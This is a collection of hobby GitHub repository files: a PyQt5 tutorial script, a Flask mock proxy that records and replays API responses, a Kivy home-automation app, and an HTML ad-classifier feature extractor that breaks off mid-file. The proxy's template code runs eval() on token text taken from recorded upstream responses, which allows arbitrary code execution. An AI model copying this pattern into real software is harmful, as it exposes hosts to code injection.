QAction(QIcon('./icon/plus.png'), 'New', self)\r\n\r\n impMenu = QMenu('Import', self)\r\n # 这里通过QMenu创建子菜单。\r\n impAct = QAction(QIcon('./icon/book.png'), 'Import mail', self)\r\n impMenu.addAction(impAct)\r\n # 后面设置impAct的属性即可完成一定功能(点击与事件连接)。\r\n\r\n fileMenu.addAction(newAct) # newAct是QAction类,不能addMenu\r\n fileMenu.addMenu(impMenu)\r\n fileMenu.addAction(exitAct)\r\n # addAction将QAction加入主菜单。\r\n # addMenu将子菜单加入到主菜单里面。\r\n\r\n moreMenu.addAction(authorAct)\r\n\r\n viewMenu = menu_bar.addMenu(\"View\") # &View和View当名字的区别在于首字母有无下划线\r\n viewStatAct = QAction('View statusBar', self, checkable=True)\r\n viewStatAct.setStatusTip('View statusBar')\r\n viewStatAct.setChecked(True) # 默认值为勾选\r\n viewStatAct.triggered.connect(self.toggleMenu)\r\n viewMenu.addAction(viewStatAct)\r\n # 添加勾选菜单,并对其属性进行设置。\r\n\r\n textEdit = QTextEdit()\r\n self.setCentralWidget(textEdit)\r\n # 创建一个文本编辑区,并且放置于QMainWindow中间区域\r\n\r\n tool_bar = self.addToolBar(\"Exit\")\r\n tool_bar.addAction(exitAct)\r\n\r\n self.show()\r\n\r\n def authorTips(self):\r\n QMessageBox.information(self, \"AuthorInfo\", \"Author: 圣雄肝帝·猛男·CJT\\n\"\r\n \"Version: 0.0.1_beta\\n\"\r\n \"Date: 2019/12/08\\n\", QMessageBox.Ok)\r\n\r\n def toggleMenu(self, state):\r\n if state:\r\n self.status_bar.show()\r\n else:\r\n self.status_bar.hide()\r\n\r\n def contextMenuEvent(self, event):\r\n # 使用contextMenuEvent()方法实现这个菜单。\r\n\r\n cMenu = QMenu(self)\r\n # 右键菜单也叫弹出框(!?),是在某些场合下显示的一组命令。\r\n # 例如,Opera浏览器里,网页上的右键菜单里会有刷新,返回或者查看页面源代码。\r\n # 如果在工具栏上右键,会得到一个不同的用来管理工具栏的菜单。\r\n\r\n newAct = cMenu.addAction('New')\r\n openAct = cMenu.addAction('Open')\r\n quitAct = cMenu.addAction('Quit')\r\n\r\n action = cMenu.exec(self.mapToGlobal(event.pos()))\r\n # 使用exec_()方法显示菜单。从鼠标右键事件对象中获得当前坐标。\r\n # mapToGlobal()方法把当前组件的相对坐标转换为窗口(window)的绝对坐标\r\n # 如果右键菜单里触发了事件,也就触发了退出事件,执行关闭菜单行为。\r\n # 与global对应的有mapToParent\r\n if action == quitAct:\r\n qApp.quit()\r\n # self.closeEvent()\r\n\r\n # 个人体会:Menu 和 toolBar 的关系\r\n # 可以类比为浏览器中的书签收藏夹(进入里面细选)和书签栏(直接展示具体每一项)\r\n def closeEvent(self, event):\r\n reply = QMessageBox.question(self,\r\n \"Cancel\",\r\n \"Are you sure to cancel?\",\r\n QMessageBox.Yes | QMessageBox.No,\r\n QMessageBox.No)\r\n if reply == QMessageBox.Yes:\r\n event.accept()\r\n else:\r\n event.ignore()\r\n\r\n def closeBtn(self):\r\n reply = QMessageBox.question(self,\r\n \"Cancel\",\r\n \"Are you sure to cancel?\",\r\n QMessageBox.Yes | QMessageBox.No,\r\n QMessageBox.No)\r\n if reply == QMessageBox.Yes:\r\n QCoreApplication.instance().quit()\r\n 
else:\r\n pass\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n ex = Example()\r\n sys.exit(app.exec())\r\n" }, { "alpha_fraction": 0.6272482872009277, "alphanum_fraction": 0.6340706944465637, "avg_line_length": 34.64393997192383, "blob_id": "732e7eea812dd15c712a6082036f7124f0330bdf", "content_id": "3dc5dae3d54c1bb5f2c58803b83670f8b4f6253a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7519, "license_type": "no_license", "max_line_length": 86, "num_lines": 132, "path": "/PyQt5/Aloha.py", "repo_name": "legendaryCJT/Learining", "src_encoding": "UTF-8", "text": "import sys\r\nfrom PyQt5.QtWidgets import QApplication\r\n# QCoreApplication包含了事件的主循环,它能添加和删除所有的事件\r\nfrom PyQt5.QtWidgets import QWidget, QToolTip\r\n# QWidget控件是一个用户界面的基本控件,提供了基本的应用构造器。\r\nfrom PyQt5.QtWidgets import QPushButton, QMessageBox\r\n#\r\nfrom PyQt5.QtWidgets import QDesktopWidget\r\n# QtGui.QDesktopWidget提供了用户的桌面信息,包括屏幕的大小\r\n# 以上引入了PyQt5.QtWidgets模块的不少组件,这个模块包含了基本的组件。\r\n\r\nfrom PyQt5.QtGui import QIcon, QFont\r\n# 有关图标和字体的设置\r\nfrom PyQt5.QtCore import QCoreApplication\r\n\r\n# 如何用程序关闭一个窗口。这里我们将接触到一点single和slots的知识。\r\n\r\n\r\nclass Example(QWidget):\r\n # QWidget是UI的基本控件,提供基本的应用构造器。\r\n # 默认情况下构造器没有父级,没有父级的构造器被称为“窗口”(window)。\r\n # 这里意味着我们调用两个构造器,一是类本身,二是这个类继承的。\r\n\r\n def __init__(self):\r\n # super()构造器方法返回父级的对象。__init__()方法是构造器的一个方法。\r\n super().__init__()\r\n self.initUI()\r\n\r\n def initUI(self):\r\n # 创建了有图标的窗口,并且有提示框和按钮,再实现按钮的功能(Quit)。\r\n\r\n QToolTip.setFont(QFont('SansSerif', 10)) # 设置提示框字体。\r\n\r\n self.setToolTip(\"This is a <b>Qwidget</b> widget\")\r\n # 调用这个方法创建提示框可以使用富文本格式的内容。\r\n\r\n btn = QPushButton('Button', self)\r\n # QPushButton(string text, QWidget parent = None)\r\n # text参数是想要显示的按钮名称,parent参数是放在按钮上的组件,在本例中,这个参数是QWidget。\r\n # 应用中的组件都是一层一层(继承而来的?)的。\r\n # 在这个层里,大部分的组件都有自己的父级,没有父级的组件,是顶级的窗口。\r\n\r\n btn.setToolTip(\"This is a <b>QPushButton</b> widget\")\r\n # 添加了一个按钮,并为其添加了一个提示框。\r\n btn.resize(btn.sizeHint())\r\n # 调整按钮大小,sizeHint()方法提供默认大小\r\n btn.move(50, 50)\r\n btn.clicked.connect(self.btnTips)\r\n # 自己写的btnTips弹窗信息框, 连接信号和时间时的方法应该传递地址(即不带\"()\")\r\n\r\n QuitBtn = QPushButton('Quit', self)\r\n # QuitBtn.clicked.connect(QCoreApplication.instance().quit)\r\n # 点击事件和能终止进程并退出应用的quit函数绑定在了一起。\r\n # 在发送者和接受者之间建立了通讯,发送者就是按钮,接受者就是应用对象。\r\n QuitBtn.clicked.connect(self.closeBtn)\r\n QuitBtn.resize(QuitBtn.sizeHint())\r\n QuitBtn.move(50, 100)\r\n # 事件传递系统在PyQt5内建的single和slot机制里面。点击按钮后,信号会被捕捉并给出既定的反应。\r\n # QCoreApplication包含了事件的主循环,它能添加和删除所有的事件。\r\n # instance()创建了一个它的实例。QCoreApplication是在QApplication里创建的。\r\n\r\n self.setGeometry(300, 300, 500, 300) # 前两是位置,后两是大小\r\n # move(移动放置的位置)和resize(改变控件大小)方法的组合\r\n self.setWindowTitle(\"Example\") # SetWindowTitle\r\n self.setWindowIcon(QIcon('./timg.jpg')) # SetWindowIcon\r\n self.center() # 自己写的使窗口居中的类函数\r\n self.show() # 为了让控件显示的方法,在内存创建而后显示器上有所显示。\r\n\r\n def closeEvent(self, event):\r\n # 如果关闭QWidget,就会产生一个QCloseEvent,\r\n # 并且把它传入到closeEvent函数的event参数中。\r\n # 改变控件的默认行为,就是替换掉默认的事件处理。\r\n reply = QMessageBox.question(self, 'Message', 'Are you sure to quit?',\r\n QMessageBox.Yes | QMessageBox.No,\r\n QMessageBox.No)\r\n # 创建了一个消息框,上面有俩按钮:Yes和No.\r\n # 第一个参数是父级窗口,此处self为主窗口QWidget生成的Example\r\n # 第二个字符串显示在消息框的标题栏,\r\n # 第三个参数(字符串)显示在对话框,第四个参数是消息框的俩按钮,\r\n # 最后一个参数是默认按钮,这个按钮是默认选中的。返回值在变量reply里。\r\n if reply == QMessageBox.Yes:\r\n event.accept()\r\n # QCoreApplication.instance().quit()\r\n else: # == QMessageBox.No\r\n event.ignore()\r\n # 
判断reply值,如果点击的是Yes按钮,就关闭组件和应用,否则忽略关闭事件。\r\n\r\n # 该事件处理系统建立在 PyQt5 的信号/槽的机制上。如果我们点击该按钮,按钮将会发出信号,\r\n # 单击信号连接到 quit() 方法使应用程序终止。槽可以是 Qt 的槽也可以是 Python 的任何调用。\r\n # QCoreApplication 包含主事件循环;它处理和调度所有事件。instance()方法为我们提供了其当前实例。\r\n # 注意,区分 QCoreApplication 与 QApplication。\r\n # 发送器和接收器:在通信的两个对象之间进行。发送器是按钮,接收器是应用对象\r\n # !!整理概念\r\n # 按钮(btn)是发送器。点击(clicked)按钮后,发出点击信号。点击信号连接(connect)到槽(可以是 Qt 的槽也可以是 Python 的任何调用)。\r\n # 在我们的例子中是Qt的槽,QCoreApplication处理和调度所有Qt事件,调度出instance(这个实例(接收器))的 quit 事件。\r\n\r\n def closeBtn(self):\r\n reply = QMessageBox.question(self, \"Quit\", \"Are you sure to quit?\",\r\n QMessageBox.Yes | QMessageBox.No,\r\n QMessageBox.No)\r\n if reply == QMessageBox.Yes:\r\n QCoreApplication.instance().quit()\r\n else:\r\n pass\r\n\r\n def btnTips(self):\r\n QMessageBox.information(self, \"Btn\", \"Clicked Btn\")\r\n\r\n def center(self):\r\n qr = self.frameGeometry()\r\n # 获得主窗口所在的框架。\r\n cp = QDesktopWidget().availableGeometry().center()\r\n # QtGui.QDesktopWidget提供了用户的桌面信息,包括屏幕的大小。\r\n # 获取显示器的分辨率,然后得到屏幕中间点的位置\r\n qr.moveCenter(cp)\r\n # 把主窗口框架的中心点放置到屏幕的中心位置。\r\n self.move(qr.topLeft())\r\n # 把主窗口左上角移动到其框架的左上角,这样就把窗口居中了。\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n # 每个PyQt5应用都必须创建一个应用对象。sys.argv是一组命令行参数的列表。\r\n # Python可以在shell里运行,这个参数提供对脚本控制的功能。\r\n ex = Example()\r\n # 实例化\r\n sys.exit(app.exec())\r\n # 进入应用主循环,事件处理器开始工作。\r\n # 从窗口接收事件并把事件派送到应用控件。\r\n # 当调用sys.exit方法或直接销毁主控件时,主循环结束。\r\n # exit方法确保主循环安全退出。外部环境能通知主控件如何结束\r\n # 有exec()与exec_() 是因为exec在py中是关键字,方便区分。\r\n" } ]
6
subeeshb/mockproxy
https://github.com/subeeshb/mockproxy
6f10e3277c79d39c435a24b48bd70281907821d5
a822c2984618a331bf0adacbdc0e6576fbb10305
4d23877d044996939ec0e18400b0b89fd6f00ed0
refs/heads/master
2020-04-12T17:57:36.312711
2013-11-29T02:06:17
2013-11-29T02:06:17
14,771,599
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.7175469994544983, "alphanum_fraction": 0.7264995574951172, "avg_line_length": 28.786666870117188, "blob_id": "3f1b178b1c708d322c251a7fee550ccad9fc9372", "content_id": "e20d57a1a376bfa8a9d0027faee11bd31f4d1d93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2234, "license_type": "no_license", "max_line_length": 341, "num_lines": 75, "path": "/README.md", "repo_name": "subeeshb/mockproxy", "src_encoding": "UTF-8", "text": "mockproxy\n=========\n\nThis is a Flask-based web application that acts as a proxy server to an API, letting you capture and repeat HTTP responses. Recorded responses can be useful when testing applications that rely on web service data.\n\nPre-requisites\n--------------\n\nTo use this script, you must first install the Flask web application framework. You can do this using pip using the command below, or refer to detailed instructions here: http://flask.pocoo.org/\n\n```\n$ pip install Flask\n```\n\n\nUsage\n-----\n\nUpdate the values in config.py. Specify the port the application should listen on, the base url (if any), and the details of the upstream API that you want to proxy to.\n\n```python\n#which port should the server run on?\nPORT = 5000\n\n#what's the base url path? e.g. do all web service requests start with 'api/'?\nBASE_URL_PATH = 'api/'\n\n#what's the actual web service endpoint? requests will be proxied here if there's\n#no recorded data available.\nUPSTREAM_ENDPOINT = {\n\t'host' : '127.0.0.1',\n\t'port' : '8080'\n}\n```\n\nThen, just start the application by running server.py. You can specify an output folder for saving web responses as a parameter, otherwise the default output folder will be 'templates'.\n\n```\n$ python server.py [output folder]\n```\n\n\nRecording and playback\n----------------------\n\nEach web service response is saved in its own file, with the folder structure in the output folder matching the url path. When a request is received, the application proxies the request to the upstream API if no response was previously recorded. If a recorded response is present, the contents of the response are processed and played back. \n\nThe application current supports request data in JSON format. You can edit recorded responses to insert dynamic values by enclosing python code within {{ ... }} blocks. 
Request data is converted into a dictionary and can be referenced using the 'request' variable.\n\nFor example, with the following request data,\n\n```\n{\n\t\"userid\":\"user001\",\n\t\"password\":\"mypassword\"\n}\n```\n\n, a request to a URL with the following recorded response\n\n```\n{\n\t\"loginstatus\":\"success\",\n\t\"userid\":\"{{ request['userid'] }}\"\n}\n```\n\nwill return the following \n\n```\n{\n\t\"loginstatus\":\"success\",\n\t\"userid\":\"user001\"\n}\n```\n" }, { "alpha_fraction": 0.6327784657478333, "alphanum_fraction": 0.6345620155334473, "avg_line_length": 33.8068962097168, "blob_id": "4315802b13b5e0f0a81a241803a458091d54af91", "content_id": "a855756a84467d3d32babd79c68a0d0c804a94cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5046, "license_type": "no_license", "max_line_length": 112, "num_lines": 145, "path": "/server.py", "repo_name": "subeeshb/mockproxy", "src_encoding": "UTF-8", "text": "from flask import Flask, Response, request\nfrom werkzeug.datastructures import Headers\nimport json\nimport sys\nimport os\nimport httplib\nimport StringIO\nimport gzip\nimport config\n\napp = Flask(__name__)\n\nDEFAULT_TEMPLATE_FOLDER = './templates/'\nHEADERS_FILE_SUFFIX = '.headers'\nREQUIRED_HEADERS = [\"set-cookie\"]\n\ndef get_response_template(path):\n filename = os.path.join(template_folder, path)\n resp_template = '{}';\n with file(filename) as f:\n resp_template = f.read()\n return resp_template\n\ndef get_response_headers(path):\n filename = os.path.join(template_folder, path + HEADERS_FILE_SUFFIX)\n headers = []\n if os.path.isfile(filename):\n with file(filename, 'r') as f:\n for line in f:\n headers.append(tuple(line.replace('\\n','').split('::')))\n return headers\n\ndef extract_tokens(template):\n tokens = {}\n while template.find('{{') > -1:\n tokenStart = template.find('{{')\n tokenEnd = template.find('}}')\n if tokenEnd == -1:\n raise Exception('Error parsing tokens: token not closed?')\n tokenName = template[tokenStart+2:tokenEnd]\n tokens[tokenName] = ''\n template = template.replace('{{' + tokenName + '}}', '')\n return tokens\n\ndef evaluate_tokens(tokens, request):\n for token in tokens.keys():\n value = eval(token.strip())\n tokens[token] = value\n return tokens\n\ndef apply_token_values(tokens, response_template):\n for token in tokens.keys():\n response_template = response_template.replace('{{'+token+'}}', tokens[token])\n return response_template\n\ndef process_response_template(request, response_template):\n tokens = extract_tokens(response_template)\n tokens = evaluate_tokens(tokens, request)\n template = apply_token_values(tokens, response_template)\n return template\n\ndef is_gzipped(response):\n return response[:2].encode('hex') == '1f8b'\n\ndef get_live_response(request, path):\n host = config.UPSTREAM_ENDPOINT['host']\n port = config.UPSTREAM_ENDPOINT['port']\n print 'Getting live response from %s:%s/%s' % (host, port, path)\n conn = httplib.HTTPConnection(host, port)\n request_headers = {}\n for key, value in request.headers:\n if key in [\"accept-encoding\"]:\n continue\n request_headers[key] = value\n conn.request(request.method, '/' + path, body=request.data, headers=request_headers)\n resp = conn.getresponse()\n print 'Response received.'\n contents = resp.read()\n print resp.getheader('content-type')\n if is_gzipped(contents):\n print 'Decoding gzip...'\n gzip_data = gzip.GzipFile(fileobj = StringIO.StringIO(contents))\n contents = gzip_data.read()\n return (contents, 
resp.getheaders())\n\ndef ensure_dir(f):\n d = os.path.dirname(f)\n if not os.path.exists(d):\n os.makedirs(d)\n\ndef save_live_response(path, response_data, headers):\n response_filename = os.path.join(template_folder, path)\n ensure_dir(response_filename)\n with open(response_filename, 'w') as output_file:\n output_file.write(response_data)\n\n headers_filename = os.path.join(template_folder, path + HEADERS_FILE_SUFFIX)\n with open(headers_filename, 'w') as output_file:\n for key, value in headers:\n header_string = '%s::%s\\n' % (key, value)\n output_file.write(header_string)\n\n\[email protected]('/', defaults={'path': ''}, methods=['GET', 'POST'])\[email protected]('/<path:path>', methods=['GET', 'POST'])\ndef handle_path(path):\n try:\n if not config.BASE_URL_PATH == '':\n path = path.replace(config.BASE_URL_PATH, '')\n\n response_template = get_response_template(path)\n if len(request.data) > 0:\n request_data = json.loads(request.data)\n response = process_response_template(request_data, response_template)\n else:\n response = response_template\n print 'Serving recorded response.'\n resp = Response(response, mimetype='application/json')\n headers = get_response_headers(path)\n for key, value in headers:\n if key in REQUIRED_HEADERS:\n resp.headers.add(key, value)\n return resp\n except IOError:\n try:\n live_response, headers = get_live_response(request, config.BASE_URL_PATH + path)\n save_live_response(path, live_response, headers)\n resp = Response(live_response, mimetype='application/json')\n for key, value in headers:\n if key in REQUIRED_HEADERS:\n resp.headers.add(key, value)\n print 'Serving live response.'\n return resp\n except Exception, ex:\n return repr(ex)\n except Exception, e:\n return repr(e)\n\n\ntemplate_folder = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_TEMPLATE_FOLDER\nprint ' * Serving data from %s' % template_folder\nprint ' * Proxying new requests to %s:%s' % (config.UPSTREAM_ENDPOINT['host'], config.UPSTREAM_ENDPOINT['port'])\n\nif __name__ == \"__main__\":\n app.run(port=config.PORT)" }, { "alpha_fraction": 0.6554877758026123, "alphanum_fraction": 0.6981707215309143, "avg_line_length": 26.41666603088379, "blob_id": "0fc34ebdc51b4c0163fb85387767f0106daef392", "content_id": "1facd1e72d9d7547ed6696412ee4dc307de403a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 328, "license_type": "no_license", "max_line_length": 81, "num_lines": 12, "path": "/config.py", "repo_name": "subeeshb/mockproxy", "src_encoding": "UTF-8", "text": "#which port should the server run on?\nPORT = 5000\n\n#what's the base url path? e.g. do all web service requests start with 'api/'?\nBASE_URL_PATH = 'api/'\n\n#what's the actual web service endpoint? requests will be proxied here if there's\n#no recorded data available.\nUPSTREAM_ENDPOINT = {\n\t'host' : '127.0.0.1',\n\t'port' : '8080'\n}" } ]
3
mayankpoddar/TestHomeAutomation
https://github.com/mayankpoddar/TestHomeAutomation
66d78c09e93ea7d227933f023e879544c4dbddcc
9cd3504d0e78e6342f4406a2399992bcdec6a674
19d1bf08f0d33545fb3cd15c6f64a9d30fd785b6
refs/heads/master
2020-05-21T02:16:36.840329
2019-05-09T22:07:29
2019-05-09T22:07:29
185,873,365
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6154360771179199, "alphanum_fraction": 0.6404193639755249, "avg_line_length": 34.86399841308594, "blob_id": "61925c6e7838e9acda9f748197761f7971f3c270", "content_id": "6bfdffe97fcc4ff5d48c9bbb237cfa300ca738b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4483, "license_type": "no_license", "max_line_length": 267, "num_lines": 125, "path": "/main.py", "repo_name": "mayankpoddar/TestHomeAutomation", "src_encoding": "UTF-8", "text": "from kivy.app import App\nfrom kivy.uix.label import Label\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.button import Button\nfrom kivy.core.window import Window\nfrom kivy.uix.screenmanager import ScreenManager, Screen\nfrom kivy.network.urlrequest import UrlRequest\nfrom kivy.uix.popup import Popup\n\nclass IntroPage(GridLayout):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.cols = 1\n\n self.label = Label(text=\"Hey there! \\n This Phone belongs to Mayank of House Poddar, \\n First of His Name, \\n King of the Andals and the First Men, \\n Lord of the Seven Kingdoms, \\n and Protector of the Realm.\", halign=\"center\", valign=\"middle\", font_size=30)\n self.label.size_hint_y = None\n self.label.height = Window.size[1]*0.9\n self.add_widget(self.label)\n\n self.button = Button(text=\"Proceed\")\n self.button.bind(on_press=self.clicked)\n self.add_widget(self.button)\n\n def clicked(self, instance):\n myapp.screenmanager.current = \"Tabs\" \n\nclass TabsPage(GridLayout):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.cols = 1\n\n self.add_widget(Label(text=\"\", size_hint_y=None, height=Window.size[1]*0.1))\n\n self.lightButtonON = Button(text=\"Switch Light ON\")\n self.lightButtonON.size_hint_y = None\n self.lightButtonON.height = Window.size[1]*0.1\n self.lightButtonON.bind(on_press=self.toggleLight)\n\n self.add_widget(self.lightButtonON)\n\n self.add_widget(Label(text=\"\", size_hint_y=None, height=Window.size[1]*0.05))\n\n self.lightButtonOFF = Button(text=\"Switch Light OFF\")\n self.lightButtonOFF.size_hint_y = None\n self.lightButtonOFF.height = Window.size[1]*0.1\n self.lightButtonOFF.bind(on_press=self.toggleLight)\n\n self.add_widget(self.lightButtonOFF)\n\n self.add_widget(Label(text=\"\", size_hint_y=None, height=Window.size[1]*0.05))\n\n self.fanButtonON = Button(text=\"Switch Fan ON\")\n self.fanButtonON.size_hint_y = None\n self.fanButtonON.height = Window.size[1]*0.1\n self.fanButtonON.bind(on_press=self.toggleFan)\n\n self.add_widget(self.fanButtonON)\n\n self.add_widget(Label(text=\"\", size_hint_y=None, height=Window.size[1]*0.05))\n\n self.fanButtonOFF = Button(text=\"Switch Fan OFF\")\n self.fanButtonOFF.size_hint_y = None\n self.fanButtonOFF.height = Window.size[1]*0.1\n self.fanButtonOFF.bind(on_press=self.toggleFan)\n\n self.add_widget(self.fanButtonOFF)\n\n self.add_widget(Label(text=\"\", size_hint_y=None, height=Window.size[1]*0.05))\n\n self.unlockButton = Button(text=\"Unlock Door\")\n self.unlockButton.size_hint_y = None\n self.unlockButton.height = Window.size[1]*0.1\n self.unlockButton.bind(on_press=self.toggleLock)\n\n self.add_widget(self.unlockButton)\n\n self.add_widget(Label(text=\"\", size_hint_y=None, height=Window.size[1]*0.05))\n\n self.lockButton = Button(text=\"Lock Door\")\n self.lockButton.size_hint_y = None\n self.lockButton.height = Window.size[1]*0.1\n self.lockButton.bind(on_press=self.toggleLock)\n\n self.add_widget(self.lockButton)\n\n self.add_widget(Label(text=\"\", 
size_hint_y=None, height=Window.size[1]*0.05))\n\n def toggleLight(self, instance):\n if instance.text == \"Switch Light ON\":\n req = UrlRequest(\"http://192.168.0.123/LED=ON\")\n else:\n req = UrlRequest(\"http://192.168.0.123/LED=OFF\")\n\n def toggleFan(self, instance):\n if instance.text == \"Switch Fan ON\":\n req = UrlRequest(\"http://192.168.0.124/FAN=ON\")\n else:\n req = UrlRequest(\"http://192.168.0.124/FAN=OFF\")\n\n def toggleLock(self, instance):\n if instance.text == \"Unlock Door\":\n req = UrlRequest(\"http://192.168.0.123/DOORLOCK=OFF\")\n else:\n req = UrlRequest(\"http://192.168.0.123/DOORLOCK=ON\")\n\nclass MyApp(App):\n\n def build(self):\n self.screenmanager = ScreenManager()\n\n self.intropage = IntroPage()\n screen = Screen(name=\"Intro\")\n screen.add_widget(self.intropage)\n self.screenmanager.add_widget(screen)\n\n self.tabspage = TabsPage()\n screen = Screen(name=\"Tabs\")\n screen.add_widget(self.tabspage)\n self.screenmanager.add_widget(screen)\n\n return self.screenmanager\n\nif __name__ == \"__main__\":\n myapp = MyApp()\n myapp.run()\n" }, { "alpha_fraction": 0.6793892979621887, "alphanum_fraction": 0.7412213683128357, "avg_line_length": 45.78571319580078, "blob_id": "55af060866faf61396544ff891ec34d5853596c9", "content_id": "6149bb092b5e433ad0397c093421b07813575471", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1310, "license_type": "no_license", "max_line_length": 139, "num_lines": 28, "path": "/README.md", "repo_name": "mayankpoddar/TestHomeAutomation", "src_encoding": "UTF-8", "text": "# TestHomeAutomation\nHomeAutomation using a Wemos D1 Mini, Servo Motor (180 degree), LED. iOS App using Kivy - Python.\n\nHardware Requirements:\n1. Wemos D1 Mini ESP8266 - https://www.amazon.in/gp/product/B077MDHLRC/\n2. Servo Motor (180 Degrees) - https://www.amazon.in/gp/product/B00MTFFAE0/\n\nWemos D1 Mini Pinout:\n![](https://escapequotes.net/wp-content/uploads/2016/02/esp8266-wemos-d1-mini-pinout.png)\n\nTools Needed:\n1. Arduino IDE \n2. Python >= 3.6\n3. XCode\n\nSetup Instructions:\n\n* IDE Setup\n 1. Download and Install the Arduino IDE from https://www.arduino.cc/en/main/software\n 2. Open Arduino > Preferences > Additional Board Manager URLs: http://arduino.esp8266.com/stable/package_esp8266com_index.json. Click OK.\n 3. Open Tools > Board > Boards Manager. Type esp in the search bar, and Install \"esp8266 by ESP8266 Community\". Click OK.\n 4. Open Tools > Board. Select Wemos D1 R1.\n 5. Paste the WemosD1.ino code inside the file. Change the ssid, password and gateway according to your router and save it.\n 6. Connect the ESP8266 module via USB. Select your USB Port from Tools > Port.\n 7. Connect a LED to GPIO Pin D5 and G. \n 7. Upload the Sketch using Sketch > Upload.\n 8. Open Browser and go to the static ip for the module: http://192.168.0.123/\n 9. Use the Links to switch On/Off the LED.\n" } ]
2
mmscibor/AdBlocker
https://github.com/mmscibor/AdBlocker
9695c57b576b7deb9c9122f8650013846ff8ec82
c0acbe807abda45ee08896e8f55de3cbaae68630
801640298e503453d0682625870868c3e8685718
refs/heads/master
2021-01-10T20:13:08.246966
2014-03-28T20:21:58
2014-03-28T20:21:58
17,447,583
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.7952662706375122, "alphanum_fraction": 0.7952662706375122, "avg_line_length": 64, "blob_id": "3b8b635dde7a027ba302c31c42e2aaeb3cbbd0b8", "content_id": "f1b38daf0efd472aa765d2451e468f0ee4b4d492", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1690, "license_type": "no_license", "max_line_length": 280, "num_lines": 26, "path": "/README.md", "repo_name": "mmscibor/AdBlocker", "src_encoding": "UTF-8", "text": "Ad Blocker\n==========\n\nThe ad blocker project attempts an alternative approach to blocking advertisements than black / white listing. Instead of \nthat, it takes as an input training data in the form of binary features of the metadata of various elements on a given\nwebpage. In the training data, it is known whether an element is or is not an ad.\n\nThe feature space in the training data, however, it extremely large and much of it is redundant and not helpful.\n\nThe initial portion of this project attempts to cut down the feature space using various methods: a PRT function in MATLAB\neliminates features based on an elimination criterion, however, very good results were also obtained by finding the correlation between the correct classification and that particular binary feature, then selecting those features with the greatest correlations.\n\nThis step was necessary because the training time on the algorithm utilized was initially very high, however the improvements made on the percentage of correctly sorted advertisements was not substantial enough to merit use of all the features.\n\nThe algorithm utilized was the TreeBagger algorithm, provided by the PRT toolikit in MATLAB. \n\nThe benefits of utilizing such an algorithm instead of a black / white list is that it needs to be maintained less, can be improved by expanding the training data (allow a user to mark an ad if it gets through, and that will automatically update the training data for all users). 
\n\nThe training phase, depending on the processing power of the machine, would last at most a few minutes, however after training is complete, classification is near instant.\n\nAuthors\n-------\n\n - Christian Sherland\n - Michael Scibor\n - Sameer Chauhan\n" }, { "alpha_fraction": 0.817460298538208, "alphanum_fraction": 0.817460298538208, "avg_line_length": 17, "blob_id": "142ff79d0d68c0f841d7fcdde254830bfb071b5d", "content_id": "d329e76c80e8591bcca1a83b0eda05479fbb790d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 126, "license_type": "no_license", "max_line_length": 20, "num_lines": 7, "path": "/FinalProject/Writeup/makefile", "repo_name": "mmscibor/AdBlocker", "src_encoding": "UTF-8", "text": "mac : adclassify.tex\n\tpdflatex adclassify\n\tbibtex adclassify\n\tpdflatex adclassify\n\tpdflatex adclassify\n\t\n\topen adclassify.pdf\n" }, { "alpha_fraction": 0.5381062626838684, "alphanum_fraction": 0.542725145816803, "avg_line_length": 26.62765884399414, "blob_id": "99dd1a680c91038c1b97a92f7b3c2e8191a3ee51", "content_id": "afc8e7f9bdcdfef4500a3c86caa72d61a312b64c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2598, "license_type": "no_license", "max_line_length": 104, "num_lines": 94, "path": "/FinalProject/extractFeatures.py", "repo_name": "mmscibor/AdBlocker", "src_encoding": "UTF-8", "text": "# Christian Sherland\n# Sameer Chauhan\n# Michael Scibor\n#\n# getData.py\n# Accepts a web url and gets features on all\n# image anchor tags on the page to classify\n# as ad or not ad\n\nfrom bs4 import BeautifulSoup\nimport urllib2\nimport csv\nimport sys\nimport re\n\nif __name__ == '__main__':\n # Parse webpage specified in arg 1\n url = sys.argv[1]\n\n try:\n content = urllib2.urlopen(url).read()\n except:\n print 'Could not open url'\n exit(-1)\n soup = BeautifulSoup(content)\n\n # for div in divs:\n # if div.find('a'):\n # print(div.find('a').get('href'))\n # if div.find('img'):\n # print(div.find('img').get('height'))\n # print(div.find('img').get('width'))\n # print(div.find('img').get('height'))\n\n\n # .find returns first instance of tag\n # .find_all returns all of them\n # general layout of AD:\n\n # <a href=\"Link\">\n # <img src=\"source\" width=\"W\" height=\"H\" alt=\"ALT\"/>\n # </a>\n # Want to find image tags WITHIN an anchor\n\n # create list of anchors which contain an image\n anchors = [a for a in soup.find_all('a') if a.find('img') ]\n\n adData = []\n\n for a in anchors:\n href, imgH, imgW, alt = 0,0,0,0 # Reset values each time\n if a.find('img'):\n print(\"Found an image\")\n href = a.get('href')\n txt = a.text\n src = a.find('img').get('src') if a.find('img').get('src') else a.find('img').get('imgsrc')\n imgH = a.find('img').get('height')\n imgW = a.find('img').get('width')\n alt = a.find('img').get('alt')\n\n print(href)\n print(txt if txt !=\"\" else \"NOTEXT\")\n print(src)\n print(imgH)\n print(imgW)\n print(alt if alt != \"\" else \"NOALT\")\n\n\n # If value is missing continue (almost always mising)\n if not (href and imgW and imgH and alt):\n print(\"Missing Component\\n\\n\")\n continue\n\n # Calculate aspect ratio to 3 decimal places\n aspect = format(imgH/float(imgW), '.3f')\n\n # Local?\n 